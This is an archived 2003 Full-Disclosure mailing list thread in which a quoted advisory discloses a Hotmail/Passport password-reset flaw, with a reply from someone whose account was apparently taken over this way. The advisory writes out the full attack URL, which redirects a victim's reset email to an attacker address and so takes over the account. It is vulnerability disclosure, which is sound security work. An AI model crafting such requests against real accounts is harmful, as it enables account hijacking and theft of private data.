lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
From: xploit at hackermail.com (dong-h0un U)
Subject: Hotmail & Passport (.NET Accounts)
    Vulnerability


I encountered my mail hacking by this method.
And looked for a person who hack it.
This method could not be exhibited easily so.
Thank at your information. :-)

P.S: Sorry for my poor english.
     Hotmail's engineers desire to solve bug fast.


----- Original Message -----
From: Muhammad Faisal Rauf Danka <mfrd@...itudex.com>
Date: Wed, 7 May 2003 19:50:51 -0700 (PDT) 
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability

> Hotmail & Passport (.NET Accounts) Vulnerability
> 
> There is a very serious and stupid vulnerability or badcoding in Hotmail / Passport?s (.NET Accounts)
> 
> I tried sending emails several times to Hotmail / Passport contact addresses, but always met with the NLP bots.
> 
> I guess I don?t need to go in details of how cruical and important Hotmail / Passport?s .NET Account passport is to anyone.
> 
> You name it and they have it, E-Commerce, Credit Card processing, Personal Emails, Privacy Issues, Corporate Espionage, maybe stalkers and what not.
> 
> It is so simple that it is funny.
> 
> All you got to do is hit the following in your browser:
> 
> https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1
> 
> And you?ll get an email on attacker@...acker.com asking you to click on a url something like this:
> 
> http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033
> 
> From that url, you can reset the password and I don?t think I need to say anything more about it.
> 
> Vulnerability / Flaw discovered 	: 	12th April 2003
> Vendor / Owner notified		:	Yes (as far as emailing them more than 10 times is concerned)
> 
> 
> Regards
> --------
> Muhammad Faisal Rauf Danka
> 
> _____________________________________________________________
> ---------------------------
> [ATTITUDEX.COM]
> http://www.attitudex.com/
> ---------------------------
> 
> _____________________________________________________________
> Select your own custom email address for FREE! Get you@...rchoice.com w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

-- 
_______________________________________________
Get your free email from http://www.hackermail.com

Powered by Outblaze

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ